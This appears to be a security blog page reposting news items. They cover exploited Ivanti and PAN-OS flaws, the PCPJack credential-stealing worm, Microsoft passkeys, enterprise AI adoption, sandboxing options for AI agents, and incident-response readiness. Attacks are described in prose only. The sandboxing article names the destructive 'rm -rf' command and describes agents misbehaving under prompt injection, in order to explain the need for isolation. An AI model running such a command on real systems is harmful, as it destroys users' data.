Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect my company's views.
Disclaimer: some of the links on this site are affiliate links; if you click on them and make a purchase, I earn a commission.
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been exploited in limited attacks in the wild.
The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1.
It allows "a remotely authenticated user with administrative access to achieve remote code execution," Ivanti said in an advisory released today.
"We are aware of a very limited number of customers exploited with CVE-2026-6973. Successful exploitation requires Admin authentication. If customers followed Ivanti's recommendation in January to rotate credentials if you were exploited with CVE-2026-1281 and CVE-2026-1340, then your risk of exploitation from CVE-2026-6973 is significantly reduced."
It's currently not known who is behind the exploitation efforts, whether any of those attacks were successful, or what the end goals of the attacks were.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by May 10, 2026.
Also patched by Ivanti in EPMM are four other flaws -
CVE-2026-5786 (CVSS score: 8.8) - An improper access control vulnerability that allows a remote authenticated attacker to gain administrative access.
CVE-2026-5787 (CVSS score: 8.9) - An improper certificate validation vulnerability that allows a remote unauthenticated attacker to impersonate registered Sentry hosts and obtain valid CA-signed client certificates.
CVE-2026-5788 (CVSS score: 7.0) - An improper access control vulnerability that allows a remote unauthenticated attacker to invoke arbitrary methods.
CVE-2026-7821 (CVSS score: 7.4) - An improper certificate validation vulnerability that allows a remote unauthenticated attacker to enroll a device belonging to a restricted set of unenrolled devices, leading to information disclosure about the EPMM appliance and impacting the integrity of the newly enrolled device identity.
"The issues only affect the on-prem EPMM product, and are not present in Ivanti Neurons for MDM, Ivanti's cloud-based unified endpoint management solution, Ivanti EPM (a similarly named, but different product), Ivanti Sentry, or any other Ivanti products," the company said.
from The Hacker News https://ift.tt/zUFHVCv
via IFTTT
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and removes any artifacts linked to TeamPCP from the environments it compromises.
"The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts," SentinelOne security researcher Alex Delamotte said in a report published today.
PCPJack is specifically designed to target cloud services like Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications, allowing the operators to spread in a worm-like fashion, as well as move laterally within the compromised networks.
It's assessed that the end goal of the cloud attack campaign is to generate illicit revenue for the threat actors through credential theft, fraud, spam, extortion, or resale of stolen access.
What makes this activity notable is that it shares significant targeting overlaps with TeamPCP, a threat actor that rose to prominence late last year by exploiting known security vulnerabilities (e.g., React2Shell) and misconfigurations in cloud services to enlist the endpoints in an ever-expanding network for conducting data theft and other post-exploitation actions.
At the same time, PCPJack lacks a cryptocurrency mining component, unlike TeamPCP. While it's not known why this obvious monetization strategy was not adopted, the similarities between the two clusters indicate that PCPJack could be the work of a former member of TeamPCP who is familiar with the group's tradecraft.
The starting point of the attack is a bootstrap shell script that's used to prepare the environment – such as configuring the payload host – and download next-stage tooling, while simultaneously taking steps to infect its own infrastructure, terminate and remove processes or artifacts that are associated with TeamPCP, install Python, establish persistence, download six Python scripts, launch the orchestration script, and remove itself.
The six Python payloads are as follows -
worm.py (written to disk as monitor.py), the main orchestrator that launches the purpose-built modules, conducts local credential theft, propagates the toolset to other hosts by exploiting known flaws (CVE-2025-55182, CVE-2025-29927, CVE-2026-1357, CVE-2025-9501, and CVE-2025-48703), and uses Telegram for command-and-control (C2)
parser.py (utils.py), to handle credential extraction and categorize stolen keys and secrets
lateral.py (_lat.py), to facilitate reconnaissance, harvest secrets, and enable lateral movement across SSH, Kubernetes, Docker, Redis, RayML, and MongoDB services
crypto_util.py (_cu.py), to encrypt credentials before exfiltration to the attacker's Telegram channel
cloud_ranges.py (_cr.py), to collect IP address ranges assigned to Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Cloudflare, Cloudfront, and Fastly, and refresh the data every 24 hours
cloud_scan.py (_csc.py), to run cloud port scanning for external propagation via Docker, Kubernetes, MongoDB, RayML, or Redis services
Propagation targets for the orchestrator script come from parquet files that the worm pulls directly from Common Crawl, a non-profit that crawls the web and provides its archives and datasets to the public at no cost.
"When exfiltrating system information and credentials, the PCPJack operator even collects success metrics on whether TeamPCP has been evicted from targeted environments in a 'PCP replaced' field sent to the C2," Delamotte said. This "implies a direct focus on the threat actor's activities rather than pure cloud attack opportunism."
Further analysis of the threat actor's infrastructure has uncovered another shell script ("check.sh") that detects the CPU architecture and fetches the appropriate Sliver binary. It also scans Instance Metadata Service (IMDS) endpoints, Kubernetes service accounts, and Docker instances for credentials associated with Anthropic, Digital Ocean, Discord, Google API, Grafana Cloud, HashiCorp Vault, OnePassword, and OpenAI, and transmits them to an external server.
"Overall, the two toolsets are well developed and indicate that the owner values making code as a modular framework, despite some redundancies in behavior," SentinelOne said. "This campaign does not [deploy miners], and it deliberately removes the miner functions associated with TeamPCP. Despite that, this actor has well-defined scopes for extracting cryptocurrency credentials."
from The Hacker News https://ift.tt/xrg4FQA
via IFTTT
World Passkey Day is a chance to reflect on progress toward a shared goal: reducing our reliance on passwords and other phishable authentication methods by accelerating passkey adoption. As cyberattacks become more automated and AI-powered, each account is only as secure as its weakest credential. Real progress requires more than adding stronger sign-in options—it requires removing phishable credentials and strengthening common attack paths like recovery flows. In partnership with the FIDO Alliance, Microsoft is committed to advancing passkey adoption through ongoing standards work, active participation in working groups, and other contributions to a passwordless future.
Passwords remain a major source of risk; they’re difficult to manage and easy to steal. Along with weaker forms of multifactor authentication, they’re also highly vulnerable to phishing: AI-powered campaigns drive click-through rates as high as 54%.1 In response, Microsoft is expanding passkey adoption across our ecosystem. We’re reducing reliance on legacy authentication and strengthening account recovery so it won’t become a backdoor for cyberattackers.
“Instead of vulnerable secrets or potentially identifiable personal information, a passkey uses a private key stored safely on the user’s device. It only works on the website or app for which the user created it, and only if that same user unlocks it with their biometrics or PIN. This means passkey users can’t be tricked into signing in to a malicious lookalike website, and a passkey is unusable unless the user is present and consenting. These are some qualities that make passkeys a ‘phishing-resistant’ form of authentication.”
Passkey adoption is accelerating: the FIDO Alliance estimates that 5 billion passkeys are already in use worldwide.2 Across Microsoft’s consumer services, including OneDrive, Xbox, and Copilot, hundreds of millions of users sign in with passkeys every day.
There are many reasons to choose passkeys as the standard authentication method over passwords. Sign-in success rates are significantly higher than with passwords, and exposure to credential-based attacks is significantly lower.3 Organizations and individual users alike prefer the simpler, more secure sign-in experience passkeys offer.4
Inside Microsoft, we’ve eliminated weaker authentication methods and rolled out phishing-resistant authentication, covering 99.6% of users and devices in our environment.5 It’s made signing in a lot simpler: no codes to enter, no extra prompts to manage, just a straightforward experience for everyone.
Product updates across sign-in and recovery
Across Microsoft, we’ve been steadily building passkey support into every layer of the identity experience: from consumer accounts to enterprise access with Microsoft Entra, and from device-based authentication like Windows Hello to Microsoft’s password manager. This work ensures people can create and use passkeys wherever they sign in, with a consistent, phishing-resistant experience across devices, apps, and environments.
To make passkeys more accessible, we’re expanding where and how people can use them:
Synced passkeys and passkey profiles in Microsoft Entra ID make it easier to scale passwordless sign-in across diverse environments. We’re expanding flexibility in cloud passkey management, including support for larger and more complex policies, and transitioning tenants to a unified passkey profile model.
Entra passkeys on Windows make it simple for users to create and use device-bound passkeys directly on personal or unmanaged Windows devices using Windows Hello, and will be generally available in late May 2026.
Passkeys for Microsoft Entra External ID will be generally available late May 2026, so your customer-facing applications can offer a more seamless, consumer-grade sign-in experience.
Passkey-preferred authentication in Microsoft Entra ID (preview) detects registered methods and prompts the strongest one first. If a passkey is registered, that’s what the user sees—immediately.
On the consumer side, with Microsoft Password Manager, users can now save and sync passkeys across devices signed in with their Microsoft account, with support for iOS and Android rolling out soon through Microsoft Edge.
Account recovery also plays a critical role in maintaining the integrity of identity systems. Historically, it’s been vulnerable to cyberattackers who try to hijack the recovery process, for example by impersonating legitimate users and requesting new credentials.
Microsoft Entra ID account recovery, generally available today, strengthens security for recovery flows by enabling users to regain access to their accounts through a robust identity verification process. Users can regain access after losing all authentication methods by using government-issued ID and biometric face checks. At general availability, we are expanding our identity verification ecosystem with two new partners—1Kosmos and CLEAR1—joining our existing partners Au10tix, IDEMIA, and TrueCredential.
Removing phishable credentials from user accounts
Strengthening authentication is important, but reducing risk means eliminating phishable credentials entirely. Microsoft is continuing to phase out legacy methods and move users toward phishing-resistant authentication. Starting in January 2027, security questions will be removed as a password reset option in Microsoft Entra ID due to their susceptibility to guessing and social engineering.
The rationale is straightforward: improving strong methods while removing weak ones shrinks the attack surface. This is increasingly urgent as AI agents act on behalf of users. If an identity is compromised, cyberattackers can leverage those agents to access systems, execute workflows, and operate within existing permissions. Organizations need to address this risk quickly.
A more secure and usable future
Last year, Microsoft joined dozens of organizations in taking the Passkey Pledge, a commitment to accelerating the adoption of phishing-resistant authentication and to moving beyond passwords. Since then, we’ve seen meaningful progress, from hundreds of millions of better-protected consumer accounts to large-scale deployments across organizations like our own.
What once felt like a long-term shift is finally gaining real momentum: authentication is becoming simpler, safer, and passwordless.
For a more in-depth perspective on how cyberattackers try to bypass authentication through fallback methods and recovery flows—and how to address those gaps—read our companion post.
Getting started
Organizations that want to strengthen their identity security posture can enable passkeys for their users and extend policy protections across both sign-in and recovery scenarios.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
The hardest part of cybersecurity isn't the technology; it’s the people.
Every major breach you’ve read about lately usually starts the same way: one employee, one clever email, and one "Patient Zero" infection.
In 2026, hackers are using AI to make these "first clicks" nearly impossible to spot. If a single laptop gets compromised on your watch, do you have a plan to stop it from taking down the whole company?
What is "Patient Zero"?
In medicine, Patient Zero is the first person to carry a disease into a population. In cybersecurity, it’s the first device an attacker hits. Once they are "in," they don't stay there—they move fast to find your data, your passwords, and your backups.
What You Will Learn
This isn't a boring lecture. It is a technical deep dive into how modern breaches start and how to kill them instantly. We are covering:
The AI Phish: How attackers use generative AI to bypass your current filters.
The 5-Minute Window: Why the first few minutes of an infection determine if you'll be in the news tomorrow.
Zero Trust in Action: How to isolate an infected device so the "virus" has nowhere to go.
The Recovery Blueprint: What to do the second you realize you have a Patient Zero.
Why You Can’t Miss This
Most security tools are great at finding "known" viruses. But they struggle with stealthy, custom-made attacks designed specifically for your company.
This webinar shows you how to build a defense that assumes someone will click a bad link—and ensures that click doesn't cost you millions.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
from The Hacker News https://ift.tt/nCpV47W
via IFTTT
Palo Alto Networks has disclosed that threat actors may have attempted, unsuccessfully, to exploit a recently disclosed critical security flaw as early as April 9, 2026.
The vulnerability in question is CVE-2026-0300 (CVSS score: 9.3/8.7), a buffer overflow vulnerability in the User-ID Authentication Portal service of Palo Alto Networks PAN-OS software that could allow an unauthenticated attacker to execute arbitrary code with root privileges by sending specially crafted packets.
While fixes are expected to be released starting May 13, 2026, customers are advised to secure access to the PAN-OS User-ID Authentication Portal by restricting access to trusted zones, or by disabling it entirely if it's not used.
In an advisory issued Wednesday, the network security company said it's aware of limited exploitation of the flaw. It's tracking the activity as CL-STA-1132, a suspected state-sponsored threat cluster of unknown provenance.
"The attacker behind this activity exploited CVE-2026-0300 to achieve unauthenticated remote code execution (RCE) in PAN-OS software. Upon successful exploitation, the attacker was able to inject shellcode into an nginx worker process," Palo Alto Networks Unit 42 said.
The cybersecurity company said it observed unsuccessful exploitation attempts against a PAN-OS device starting April 9, 2026; a week later, the attackers managed to obtain remote code execution against the appliance and inject shellcode.
As soon as initial access was achieved, the threat actors took steps to clear crash kernel messages, delete nginx crash entries and records, and remove crash core dump files in an attempt to cover their tracks.
Post-exploitation activities conducted by the adversary included conducting Active Directory (AD) enumeration and dropping additional payloads like EarthWorm and ReverseSocks5 against a second device on April 29, 2026. Both tools have been previously used by various China-nexus hacking groups.
"Over the last five years, nation-state threat actors engaged in cyber espionage have increasingly focused their efforts on edge-network technological assets, including firewalls, routers, IoT devices, hypervisors and various VPN solutions, which provide high-privilege access while often lacking the robust logging and security agents found on standard endpoints," Unit 42 said.
"The reliance of the attackers behind CL-STA-1132 on open-source tooling, rather than proprietary malware, minimized signature-based detection and facilitated seamless environment integration. This technical choice, combined with a disciplined operational cadence of intermittent interactive sessions over a multi-week period, intentionally remained below the behavioral thresholds of most automated alerting systems."
from The Hacker News https://ift.tt/gV3W7su
via IFTTT
Meanwhile in userland, most knowledge workers are still just using AI as a fancy answer engine.
When I talk to customers, it seems all I hear about are stalled pilots, Copilot deployments that don’t meet expectations, and feelings that agent demos from conferences don’t translate to anything close to what a company could actually run in production. (I love this 18-minute segment from The Artificial Intelligence Show podcast on this topic.)
The problem isn’t about agents, per se. It’s that most people view agents as the ultimate goal of AI, and now that agents are becoming real(ish), people want to jump right to them even though they haven’t taken the intermediate steps to get there.
I’ve written over and over that agents need to be viewed like human workers, rather than software tools. After all, in order to be successful, agents need the same things as humans: context, guidance on judgment, understanding of the established way of working, etc. (Deploying an agent without this is like handing a new hire a laptop & login and saying, “Now go do my job.”) AI agents without this fail for the same reasons a human would.
Crawl … Run! (Wait, did we skip “walk”?)
You know that phrase, “crawl, walk, run.” It can apply to AI in the enterprise too. Crawl is using AI via a chat interface (where most are today). Run is having AI agents do useful work throughout the company (what everyone is talking about now). So what happened to walking?
Walking is where you teach AI how you actually work, what context matters, and what good looks like. It’s where you build skills, capture how decisions get made, and give AI memory that persists between sessions. (I laid out the full version of this progression in my 7-stage roadmap for human-AI collaboration. Each stage builds on the one before it, and you can’t skip steps.)
You can’t skip steps!!
What does walking look like?
I use the cognitive stack to illustrate how AI is entering the knowledge workplace. Worker interaction with AI is at the top. Context, skills, and judgment are in the middle. Agents are at the bottom.
Everyone understands the top part, since human workers telling AI what they want to do is how most of us have been using AI for years. And everyone understands the bottom part (even if only in fantasy) where AI agents go into the real world and do real work. But how do you connect those two together? That’s the walking part.
I argue that the reason people are having challenges with agents in the workplace is because they’re skipping from crawl to run. In other words, they tell AI what they want (crawl), and they’ve empowered AI with logins and agency and tools (run), but they haven’t given AI the skills or context (walk).
At this point you’re probably thinking that I’ll spend the rest of this post explaining why the walking step is important. But no! I mean, yes, walking is important. But also:
Even after you learn how to run, you still mostly walk everywhere
Even if you can see a “run” future where AI agents do all sorts of real work, remember that most people spend more time crawling and walking than they do running. Sure, running is fastest, but it’s also tiring, you get sweaty, and it’s easier to fall.
Successfully leveraging AI in the enterprise is going to be about applying the right approach to each task. Let’s say you need to analyze some data. (A spreadsheet, customer list… whatever.) You can do that analysis at any layer of the stack. So which layer do you choose? (Remembering that each layer down costs more than the one above it while also requiring the layers above it.)
The easiest and simplest (crawl) is you just do it yourself. You open Excel, paste in the data, and write some formulas. There’s no AI involved. It’s cheap (no tokens), fast, and reliable because you’re the one doing it.
One layer deeper, you paste the data into your LLM and have AI reason over it in the context window. Maybe that costs 1,000 tokens. The more context you give the AI, the better chance you have of getting the results you want.
Deeper still, you can use a skill (maybe a Python script you built once and reuse). The cost per run isn’t going to be any more than in-context reasoning, though this one has a dependency: the skill had to be built with context and judgment, and it has to be maintained. And it requires the layers above it.
Finally, you could go all the way down to “run” and have a computer using agent do it, where AI operates Excel like a human would, pasting in the data, clicking cells, writing formulas, and doing the whole thing autonomously. It might cost 200,000 tokens, it’s slower, and it’s more likely to make mistakes. (But hey, you’re “running” with an agent!) But using an agent here only works if it has the context, skills, and judgment from the layers above to know what “good” looks like. Without those layers, you’ll spend 200,000 tokens to do something the layers above could’ve done for 1,000, or for free by just opening Excel yourself.
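The “skill” layer in the walkthrough above can be as small as a saved script you build once and reuse for free. A hypothetical sketch (the function name and CSV layout are made up for illustration, not from the original post):

```shell
# Hypothetical "skill": a reusable function that summarizes a numeric CSV
# column. Built once with context and judgment, it then runs for zero tokens,
# no LLM or agent required.
summarize_col() {
  # $1 = CSV file, $2 = 1-based column index (default 1); skips the header row
  awk -F, -v c="${2:-1}" '
    NR > 1 { sum += $c; n++ }
    END    { if (n) printf "rows=%d sum=%.2f mean=%.2f\n", n, sum, sum / n }
  ' "$1"
}
```

Calling `summarize_col sales.csv 2` then replaces a 200,000-token agent run (or a 1,000-token in-context pass) with a fraction of a second of local compute.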
Don’t focus on agents before you’ve solidified the layers in between
Once you’ve built out all the layers of your cognitive stack, agents stop being the only destination, instead becoming just one of many approaches in your AI arsenal (alongside in-context reasoning, skills, and just doing things yourself). The future of AI in the enterprise isn’t about racing to deploy agents. It’s balancing the right effort, the right tool, and the right type of token for each task.
The companies who figure this out will “run” circles around the ones racing straight to agents. They’ll spend a fraction of the tokens, deliver higher quality work, and reach for an agent only when it’s actually warranted. The ones racing straight to agents will burn tokens, dollars, and effort wondering why their pilots stalled.
Crawl before you walk. Walk before you run. Run fast when you need to, but never forget how to walk and crawl.
“AI agents will become the primary way we interact with computers in the future. They will be able to understand our needs and preferences, and proactively help us with tasks and decision making.”
Satya Nadella
CEO of Microsoft
Whether you are a software engineer, a product manager, or a designer, this quote should fundamentally change how we approach our daily routine. We are no longer just building interfaces; we are creating environments where agents can operate autonomously with minimal human interaction. What could be the fundamental requirement for such an environment?
In a single word: Isolation.
A user interacting with traditional software is constrained by the actions it allows. But agents are non-deterministic, and therefore prone to hallucination and prompt injection. Once you give an AI write access to your systems, there is nothing stopping it from executing rm -rf and deleting all your data. Of course, there are different ways to solve this problem, with one approach being sandboxing: an isolated, controlled environment used for experimentation and testing without affecting the surrounding system.
So, I started exploring different strategies to sandbox the agents. Starting with a bare minimum setup and going all the way to setting up a cloud VM. Here is what I learned at each step.
1. Let’s Start with the Baseline
Chroot has been the traditional way to achieve file system isolation. It works well when you want the process to think that a specific, restricted directory is the absolute root of the machine.
However, there are two major caveats.
If the process inside the chroot has root privileges, it could break out.
While it offers file isolation, process isolation is still a problem. A malicious agent can still see other processes running on your system and try to kill them.
As you can see above, doing an ls /proc still shows all the processes running on the host.
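The /proc leak described above is easy to reproduce. A minimal sketch (the jail path and the use of busybox are illustrative choices; the commands are wrapped in a function so nothing privileged runs when the file is sourced, and you call it as root on a Linux host):

```shell
# Minimal chroot jail demo. Requires root; /srv/jail and busybox are
# illustrative, not from the original article.
chroot_demo() {
  mkdir -p /srv/jail/bin /srv/jail/proc
  cp "$(command -v busybox)" /srv/jail/bin/sh     # static shell, no libraries to copy
  mount -t proc proc /srv/jail/proc               # the step that re-exposes host PIDs
  chroot /srv/jail /bin/sh -c 'echo /proc/[0-9]*' # glob still expands to every host PID
}
```

Run `chroot_demo` as root to see the jailed shell enumerate every process on the host, which is exactly the gap systemd-nspawn closes.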
This is when I learnt about systemd-nspawn, also called “chroot on steroids”. The difference between chroot and systemd-nspawn is that the latter provides isolation at the network and process levels in addition to the file system.
Now, when I run the same ls /proc inside the systemd-nspawn mybox container, I see only the processes in the mybox container, achieving process-level isolation.
Pros
Lightweight compared to container runtimes like Docker, with faster startup times.
Native support in Linux.
Caveats
systemd-nspawn is not very popular in the developer community unless you are deep into Linux.
While this works for Linux, what if you need to run your agents on Windows? You will have to find alternatives depending on the platform.
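To try systemd-nspawn yourself, a minimal sketch (the Debian base and the mybox machine name are assumptions; run the function as root on a Linux host with debootstrap installed, nothing runs when the file is merely sourced):

```shell
# Boot a throwaway systemd-nspawn container with its own PID namespace.
# Wrapped in a function so no privileged command runs on source.
nspawn_demo() {
  debootstrap stable /var/lib/machines/mybox   # build a minimal Debian root tree
  systemd-nspawn -D /var/lib/machines/mybox \
    /bin/sh -c 'ls /proc'                      # lists only the container's own PIDs
}
```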
2. Are Containers Enough?
Another technology that comes to mind when thinking about isolated environments is Docker. And unlike the previous concepts we discussed, Docker has a broader ecosystem and a strong community.
With containers, you also get isolated file systems, network interfaces, and process trees. They also come with cross-platform support across Mac, Windows, and Linux. With all these advantages, creating and running agents across different platforms becomes very easy, which makes containers an obvious choice.
However, the model becomes more complex when containers become a dev platform for agents. More often than not, agents need to execute generated code in separate environments, which in practice means spinning up new Docker containers on demand. This introduces a container-in-container pattern (Docker-in-Docker), where an agent running inside a container needs to build and run other containers.
To make Docker-in-Docker work, we would have to run the container in privileged mode (--privileged), which gives the container's processes elevated permissions and dramatically weakens the isolation. At this point, the isolation guarantees are significantly diminished. As a result, complete isolation for agents using only containers becomes tricky.
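The privileged-mode requirement is easy to see in practice. A sketch (the container name is arbitrary and a running Docker daemon is assumed; wrapped in a function so nothing runs on source):

```shell
# Docker-in-Docker: the inner daemon only works because of --privileged,
# which is precisely the flag that weakens the outer container's isolation.
dind_demo() {
  docker run -d --name dind --privileged docker:dind  # inner Docker daemon
  sleep 15                                            # let the inner daemon come up
  docker exec dind docker run --rm hello-world        # a container inside the container
  docker rm -f dind                                   # clean up
}
```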
3. Do Virtual Machines Help?
As you might have already predicted, Virtual Machines (VMs) offer the strongest isolation. With a VM, you get an entire OS, file system, and network of your own. For example, I currently run macOS with Lima, a Linux VM, for Linux-specific workloads.
However, the tradeoff is that spinning up a VM is expensive. And if this needs to be done for every agent, it is not scalable. Here are some stats that show how expensive a VM is compared to systemd-nspawn and chroot:
| Approach | Per Agent Cost | Boot Time | 10 Agents |
| --- | --- | --- | --- |
| VM (Lima) | ~4GB RAM + 4 CPU | 30-60s | ~40GB RAM |
| systemd-nspawn | ~10MB RAM | < 1s | ~100MB RAM |
| chroot | 1MB RAM | instant | ~10MB RAM |
For example, in the below screenshot you can see the cost of running a Lima VM.
4. MicroVMs to the rescue
A MicroVM (Micro Virtual Machine) felt like the perfect answer to the isolation story. So what is a MicroVM, and what makes it better?
A MicroVM is a lightweight virtualisation technology that provides the strong security and isolation of a traditional VM, along with the speed of a container.
Strong security and isolation are enabled because a MicroVM gets its own kernel, aka the Guest Kernel, unlike containers, which use a shared kernel. Because of this, any compromise inside the Guest OS does not directly affect the host or the other VMs.
Speed: unlike traditional VMs, it is provisioned with minimal hardware (no USB or PCI buses) and bypasses BIOS/UEFI boot, significantly reducing device emulation overhead and startup latency.
Amazon open-sourced Firecracker in 2018, one of the earliest implementations of the MicroVM architecture. While this helped catalyze the MicroVM architecture, Firecracker is restricted to Linux environments. And most agentic orchestration tends to happen on developers’ laptops, which run macOS and Windows as well.
Docker addressed this gap with its Sandbox offering. The best part is their MicroVM-based architecture, which runs natively across macOS, Windows, and Linux, delivering better isolation, faster startup times, and a smoother developer experience. We will learn about this in a bit.
5. gVisor
gVisor takes a unique approach to solving the isolation problem. While the previous strategies relied on the OS kernel, gVisor creates its own kernel, called the “application kernel”, running in user space.
When a standard containerized app wants to do something like open a file, allocate memory, or send network traffic, it makes a “system call” (syscall) directly to the host’s Linux kernel.
With gVisor, your app is bundled with a component called the Sentry.
The Sentry intercepts every single syscall your application makes.
It processes that request in user-space using its own implementation of Linux networking, file systems, and memory management.
If the Sentry absolutely needs the host kernel to do something (like actual disk I/O), it translates the request into an extremely restricted, heavily filtered, safe call to the host.
However, it suffers from the same problem as systemd-nspawn: not much broader community support, and it only runs on Linux.
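If runsc (gVisor's container runtime) is installed and registered with Docker, the user-space application kernel is easy to observe. A sketch, wrapped in a function so nothing runs on source:

```shell
# Run a container under gVisor's runsc runtime. dmesg inside the container
# reports gVisor's own application kernel, not the host kernel's ring buffer.
gvisor_demo() {
  docker run --rm --runtime=runsc alpine dmesg
}
```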
Docker Sandbox
With Docker Sandboxes, AI coding agents run in isolated microVM environments. The performance is as seamless as it can be, identical to running on the host, but with significantly stronger isolation and security. This means you can run your autonomous agents without worrying about host compromise or unintended access to your local environment.
Sandbox achieves this level of security through three layers of isolation:
Hypervisor Isolation
Every Sandbox has its own Linux kernel. So, anything that affects the sandbox kernel will not affect the host or other sandboxes.
Network Isolation
Each Sandbox has its own isolated network, meaning sandboxes cannot communicate with each other or with the host.
In addition, network policies can be enforced to allow or disallow traffic from a source.
Docker Engine Isolation
This is what made me fall in love with this new architecture. Every Sandbox gets its own Docker Engine. As a result, whenever the agent runs docker pull or docker compose, those commands are executed against the internal engine rather than the external Docker daemon.
Because of this, agents running inside can only see Docker services within their sandbox and nothing else, adding an additional layer of security.
| Attribute | Traditional VM | Container | Docker MicroVM |
| --- | --- | --- | --- |
| Isolation | Strong (dedicated kernel) | Weak (shared kernel) | Strong (dedicated kernel) |
| Boot time | Minutes | Milliseconds | Seconds (after the first image pull) |
| Attack surface | Large | Medium | Minimal |
To demonstrate Docker Engine isolation, I created two Sandbox sessions, ran the Docker hello-world container image in one, and then ran docker ps -a in both.
As you can see from the screenshot below, one session has the hello-world container and the other does not, because each session runs its own Docker Engine daemon.
If there is one takeaway, it’s this: isolation plays a major role when building autonomous AI agents, because the blast radius of a security mistake is significant.
Each approach we explored so far solves a different piece of the isolation puzzle. Containers improve portability and developer experience, but inherit the risks of a shared kernel. Virtual machines deliver strong isolation, but the overhead doesn’t scale when you’re spinning up dozens of agents. gVisor sits in an interesting middle ground, though compatibility and community trade-offs might slow you down.
Among all these, what makes Docker Sandbox with MicroVMs compelling is how it unifies these dimensions: VM-level security, container-like startup speed, and a workflow developers already know. Per-sandbox Docker Engines and strict network boundaries make it a strong foundation for running untrusted, autonomous workloads at scale.
So, what are you waiting for? Go ahead and try it out today.
Having an incident response retainer, or even a pre-approved external incident response firm, is not the same as being ready for an incident. A retainer means someone will answer the phone. Operational readiness determines whether that team can do meaningful work the moment they do.
That distinction matters far more than many organizations realize. In the first hours of a security incident, attackers are not waiting for your identity team to provision emergency accounts, for legal to decide whether an outside firm can access sensitive systems, or for someone to figure out who owns the EDR console. Every delay gives the attacker more uninterrupted time in your environment. Every hour lost to logistics increases the likelihood of deeper compromise, broader impact, and more expensive recovery.
The same is true internally. An organization may have an incident response plan, a capable security team, and a list of escalation contacts, yet still be unprepared to respond under pressure. Readiness is not measured by what exists on paper. It is measured by how quickly responders, internal or external, can gain visibility, understand what the attacker has already touched, and make informed decisions.
On Day Zero, responders are not asking for unlimited control. They are asking for visibility first and authority second. Without visibility, containment decisions are made blindly, timelines cannot be reconstructed, and the true scope of the compromise remains unknown while the response team debates access and approvals.
This guide outlines what responders need on Day Zero, where organizations most often fall short, and how to ensure your internal team and external IR partner can begin effective work immediately when an incident is declared.
What determines response speed
Whether the first responders are internal security staff, an external retainer firm, or both working in parallel, they need access to the same core systems. Internal teams may already have some of that access. External responders usually do not unless it has been prepared in advance.
Not all access is equally urgent. Identity comes first, because identity reveals the blast radius. It shows how the attacker got in, which credentials are compromised, how privilege may have changed, and where the attacker is likely to move next. Cloud, endpoint, and logging access are all critical, but without identity visibility, responders are building a timeline on guesswork.
Identity and authentication access
Modern attacks run on identity. Stolen credentials, abused tokens, misconfigured privileges, and compromised sessions are now central to how attackers gain persistence and move laterally. If responders cannot see identity activity, they cannot explain the initial compromise, trace privilege escalation, or identify which accounts are already unsafe to trust.
For external IR firms, identity access is often the first major bottleneck. Organizations delay access while teams debate permissions, search for the right administrator, or attempt to create accounts during the incident itself. During that delay, responders are effectively blind to the attacker’s movement.
On Day Zero, responders need read and investigative access to the identity provider, directory services, SSO platforms, and federation layers. They need visibility into authentication logs, MFA events, token issuance, session activity, privileged accounts, service accounts, and recent permission changes. They also need a defined path for urgent actions such as credential resets, token invalidation, or temporary restrictions on privileged users.
Cloud and SaaS access
In cloud environments, attacker activity often looks normal unless responders can see it in context. It may appear as API calls, configuration changes, new role assignments, service account abuse, or use of legitimate automation. Without immediate access, critical evidence may disappear before it is reviewed.
On Day Zero, responders need read access to relevant cloud accounts, subscriptions, and SaaS platforms. They need visibility into audit logs, control plane activity, IAM and RBAC configurations, compute workloads, storage access patterns, serverless functions, service accounts, and secrets management. Delays in cloud access are especially damaging because some telemetry is ephemeral. If it is not captured quickly, it may be gone permanently.
Endpoint and EDR access
Endpoint telemetry often provides the clearest picture of attacker behavior, especially in the early stages of an investigation. Process execution, command-line activity, credential dumping, persistence mechanisms, and lateral movement frequently show up first in the EDR.
Without direct access, responders are forced to rely on screenshots, summaries, or findings relayed through internal teams who are already under pressure. That is not a serious investigation. It is a game of telephone during a crisis.
On Day Zero, responders need investigator-level access to EDR tools, visibility into process and network activity, the ability to query historical telemetry across hosts, and the authority to isolate systems or initiate containment when needed. If those permissions are not ready in advance, valuable time is lost, and the risk of misunderstanding grows.
Logging and monitoring access
Logs are how responders reconstruct the full story of an attack, not just what happened after detection, but what happened before it. Too often, organizations discover that their retention periods are designed for compliance or cost efficiency rather than investigation.
Fourteen days of retention is common. Ninety days should be the minimum baseline. If an attacker has been active for six weeks before detection, a 14-day window means the initial access event, early reconnaissance, and much of the lateral movement may already be gone.
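The arithmetic is worth making concrete. A minimal sketch, using illustrative numbers only, of how retention interacts with attacker dwell time:

```python
from datetime import date, timedelta

def visible_window(detection: date, retention_days: int, dwell_days: int):
    """Return (days of the intrusion still covered by logs,
    whether the initial access event is still captured)."""
    initial_access = detection - timedelta(days=dwell_days)
    oldest_log = detection - timedelta(days=retention_days)
    covered = (detection - max(initial_access, oldest_log)).days
    return covered, initial_access >= oldest_log

detected = date(2026, 3, 1)
# Attacker active for six weeks (42 days) before detection:
print(visible_window(detected, retention_days=14, dwell_days=42))  # (14, False) - initial access lost
print(visible_window(detected, retention_days=90, dwell_days=42))  # (42, True) - full timeline visible
```

With a 14-day window, responders can see only the last third of the intrusion; the 90-day baseline keeps the initial access event in scope.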
Responders need access to centralized SIEM or log aggregation tools, firewall and IDS/IPS logs, VPN and remote access logs, email security logs, and cloud and SaaS audit trails across all relevant tenants. If those logs are incomplete, siloed, or overwritten, responders are forced to make high-stakes decisions with partial evidence.
Access must be real, not theoretical
